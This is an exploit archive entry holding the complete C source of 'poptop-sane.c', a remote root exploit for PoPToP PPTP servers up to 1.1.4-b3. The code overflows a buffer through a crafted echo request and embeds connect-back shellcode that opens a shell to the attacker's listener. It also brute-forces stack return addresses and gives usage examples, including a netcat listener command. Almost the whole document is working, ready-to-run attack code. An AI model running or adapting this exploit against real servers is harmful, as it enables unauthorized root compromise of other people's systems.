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poptop-sane.c

poptop-sane.c
Posted Apr 30, 2003

Remote root exploit for PoPToP, the PPTP server designed for Linux, versions 1.1.4-b3 and below. Fixed by blightninjas. Original code by einstein.

tags | exploit, remote, root
systems | linux
SHA-256 | 7b259fb68ba2f2394efa8a75f26c214b7561cd714f3e1726df283dfa4947ffe2

poptop-sane.c

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/*
* Fixed Exploit against PoPToP in Linux (poptop-sane.c)
* ./r4nc0rwh0r3 of blightninjas (blightninjas@hushmail.com)
*
* blightninjas: bringing pain, suffering, and humiliation to the security world
* Expect more great release like helloworld-annotated.c and
* cd explained whitepaper, we are working hard in da underground
*
* This is highly based off of the crappy code ridiculed below and
* in poptop-annotated.c and poptop-port-annotated.c
* I know, we are lazy. I mean evil. er, whatever
*
* This could was originally horribly written for win32
* by einstein himself, einstein_dhtm@front.ru
* He gets the award for the some of the shitty c code I have ever seen
* (And it didn't seem to work, at all)
*
* It was then horribly ported to linux, see annotated versions.
* This was done by john leech (https://www.johnleach.co.uk)
* Yeah, It didn't even compile, and it sleep'd for 500 seconds per brute force
* I'm sure it was just part of his mad IDS eluding teqneek
*
* Notes on the exploit:
* This was only tested under slackware, RET_OFF could possibly
* be different.
* You can have nulls in the shellcode (the hole is in a read())
* This allows you to have ips and ports with nulls in them
*
* Thanks to BlueBoar for the rimjobs at defcon
* Thanks to ADM, TESO, and all the other "cool" groups that never give us 0day
*
* Examples:
* attack target 1
* nc -v -l -p 10000 <-- on 1.1.1.2
* ./poptop-sane 1.1.1.1 1.1.1.2 10000 -t 1
* don't come to use, we come to you.
*
* ./poptop-sane 1.1.1.1 1.1.1.2 10000 -t
* list targets
*
* ./poptop-sane 1.1.1.1 1.1.1.2 10000 -r 0xbffff600
* attack using ret address 0xbffff600
*
* I think you get the point
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>

#define NOP_LENGTH 140
// I calculate at 336, I'll fudge to make more general
#define RET_OFF 320
#define MAX_HOSTNAME_SIZE 64
#define MAX_VENDOR_SIZE 64
#define PPTP_VERSION 0x0100
/* Magic Cookie */
#define PPTP_MAGIC_COOKIE 0x1a2b3c4d

/* Message types */
#define PPTP_CTRL_MESSAGE 1

/* Control Connection Management */
#define START_CTRL_CONN_RQST 1
#define START_CTRL_CONN_RPLY 2
#define STOP_CTRL_CONN_RQST 3
#define STOP_CTRL_CONN_RPLY 4
#define ECHO_RQST 5
#define ECHO_RPLY 6

// brute force values
// Values can be increased both ways
#define TOPOFSTACK 0xbffff800
#define BOTTOMOFSTACK 0xbffff000
#define STEP 64

/* esdee I love you, call me sometime */
char
shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";

int st;
struct target {
char *desc;
u_int32_t ret;
} targets[] =
{
{"Slackware 8.0 Linux 2.4.18 pptpd-1.0.1", 0xbffff540},
{"Slackware 8.0 Linux 2.4.18 pptpd-1.1.3", 0xbffff580},
};

struct pptp_header {
u_int16_t length; /* pptp message length incl header */
u_int16_t pptp_type; /* pptp message type */
u_int32_t magic; /* magic cookie */
u_int16_t ctrl_type; /* control message type */
u_int16_t reserved0; /* reserved */
};

struct pptp_start_ctrl_conn_rqst {
struct pptp_header header; /* pptp header */
u_int16_t version; /* pptp protocol version */
u_int16_t reserved1; /* reserved */
u_int32_t framing_cap; /* framing capabilities */
u_int32_t bearer_cap; /* bearer capabilities */
u_int16_t max_channels; /* maximum channels */
u_int16_t firmware_rev; /* firmware revision */
u_int8_t hostname[MAX_HOSTNAME_SIZE]; /* hostname */
u_int8_t vendor[MAX_VENDOR_SIZE]; /* vendor */
};

struct pptp_echo_rqst {
struct pptp_header header; /* header */
u_int32_t identifier; /* value to match rply with rqst */
char buf[10000];
};

struct pptp_reply {
struct pptp_header header; /* header */
char buf[10000];
};

void catch_pipe() {
printf("Broken pipe caught, server most likely patched.\n");
exit(1);
}
void send_init_request(int st)
{
struct pptp_start_ctrl_conn_rqst request;
request.header.magic = htonl(PPTP_MAGIC_COOKIE);
request.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
request.header.ctrl_type = htons(START_CTRL_CONN_RQST);

request.version = PPTP_VERSION;
request.framing_cap = 0;
request.bearer_cap = 0;
request.max_channels = 1;
request.firmware_rev = 0;
strcpy(request.hostname,"hell");
strcpy(request.vendor,"domain HELL");
request.header.length = ntohs(sizeof(request));

send(st,(char*)&request,sizeof(request),0);
}

void send_ping_overflow(int st, u_int32_t ret, char *hostname, short port)
{
struct pptp_echo_rqst ping;
int i, buflen = 500;

ping.header.magic = htonl(PPTP_MAGIC_COOKIE);
ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE);
ping.header.ctrl_type = htons(ECHO_RQST);
ping.identifier = 111;
ping.header.length = ntohs(1);

for (i = 0; i < NOP_LENGTH; i++) ping.buf[i] = '\x90';

*(unsigned long int*)(shellcode+33) = inet_addr(hostname);
*(unsigned short int*)(shellcode+39) = htons(port);

memcpy(ping.buf+NOP_LENGTH,shellcode,sizeof(shellcode));
for(i = RET_OFF; i < buflen - 4; i+=4)
memcpy(ping.buf+i,(char*)&ret,4);

send(st,(char*)&ping,sizeof(ping.header)+buflen,0);
}

int connect_server(char* hostname)
{
struct sockaddr_in addr;
st=socket(PF_INET,SOCK_STREAM,0);
if ((st=socket(PF_INET,SOCK_STREAM,0)) == -1) return 0;

addr.sin_family=AF_INET;
addr.sin_port=0;
addr.sin_addr.s_addr=0;
bind(st, (struct sockaddr *)&addr,sizeof(struct sockaddr));

addr.sin_family=AF_INET;
addr.sin_port=htons(1723);
addr.sin_addr.s_addr=inet_addr(hostname);
printf("connecting... ");
if ((connect(st,(struct sockaddr*)&addr,sizeof(addr))) != 0)
{
perror("connect");
return 0;
}
return 1;
}

int main(int argc, char** argv)
{
struct pptp_reply reply;
// rushing things only makes it worse
int timeout = 1000;
u_int32_t ret;
int bytes, j, checked = 0;
signal(SIGPIPE, catch_pipe);
printf("\n");
// Sorry, I failed REALLY FUCKING LAME ASCII ART class
printf(" D A SSSSS \n");
printf(" D A A S SSSSS T\n");
printf(" D A A S S T EE AA M M \n");
printf(" DDD D AAAAAAA SSSSS S T E E A A MM MM \n");
printf(" D DD A A S SSSSS TTTT E E A A MM MM \n");
printf(" D D A A S S T EEE AAAA M M M \n");
printf(" D D A A SSSSS S T E A A M M \n");
printf(" DDDD A A SSSSS TTT EEE A A M M ");
printf(" ... presents ... \n\n");
printf("Exploit for PoPToP PPTP server older than\n1.1.4-b3 and 1.1.3-20030409 under Linux.\n");
printf("by .einstein., April 2003. <-- the genius\n\n");
printf("fixed by ./r4nc0rwh0r3 of blightninjas blightninjas@hushmail.com\n\n");
if (argc < 2)
{
printf("usage: \n");
printf(" %s <pptp_server> [your_ip] [your_port] ...\n",argv[0]);
printf(" -b [timeout in ms]\n");
printf(" -t [target]\n");
printf(" -r [ret address]\n");
//Abridged edition
printf(" Only supply pptp_server to test exploitability using really poor method.\n");
printf(" Connect back to your_ip at your_port.\n\n");
return 0;
}

if (argc == 2)
{
if (!connect_server(argv[1])) return 1;

printf("\nChecking if the server is vulnerable..\n");
printf("(if it is you have to wait 65 seconds)..\n");
send_init_request(st);

ret = 0x01010101;

//header length
bytes = recv(st,(char*)&reply,2,0);
bytes = ntohs(reply.header.length);
bytes = recv(st,(char*)&reply+2,bytes-2,0);
j = htons(reply.header.ctrl_type);
send_ping_overflow(st,ret,"0.0.0.0",0);

//header length
bytes = recv(st,(char*)&reply,2,0);
printf("PoPToP server is ");
if ((bytes = recv(st,(char*)&reply,2,0)) != -1) printf("vulnerable!\n");
else printf("not vulnerable\n");
close(st);

return 1;
}
if(argc < 5) exit(1);
else if(strncmp(argv[4], "-b", 2) == 0) {
if(argc == 6) timeout = atoi(argv[5]);
printf("[!] Attempting bruteforce against %s, timeout: %d\n", argv[1], timeout);
printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3]));

for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP) {
printf("[*] ");
if (!connect_server(argv[1])) return 1;
printf("[ret=0x%x]..",ret);
printf("sending payload..");

// initial packet
send_init_request(st);

//a real overflowing ping packet
send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
close(st);

usleep(timeout * 1000);
printf("done\n");
}
}
else if(strncmp(argv[4], "-t", 2) == 0) {
if(argc == 6 && atoi(argv[5]) >= 0
&& atoi(argv[5]) < sizeof(targets)/sizeof(struct target)) {
ret = targets[atoi(argv[5])].ret;
printf("[!] Attacking %s using %s\n", argv[1], targets[atoi(argv[5])].desc);

printf("[*] ");
if (!connect_server(argv[1])) return 1;
printf("[ret=0x%x]..",ret);
printf("sending payload..");

// initial packet
send_init_request(st);

//a real overflowing ping packet
send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
close(st);

printf("done\n");
}
else {
for(j = 0; j < sizeof(targets)/sizeof(struct target); j++) {
printf("%02d - %s\n", j, targets[j].desc);
}
printf("\n");
}
}
else if(strncmp(argv[4], "-r", 2) == 0) {
if(argc == 6) {
sscanf(argv[5], "%x", (unsigned int *)&ret);
printf("[!] Attacking %s\n", argv[1]);

printf("[*] ");
if (!connect_server(argv[1])) return 1;
printf("[ret=0x%x]..",ret);
printf("sending payload..");

// initial packet
send_init_request(st);

//a real overflowing ping packet
send_ping_overflow(st,ret,argv[2],atoi(argv[3]));
close(st);

printf("done\n");
}
}
return 0;
}
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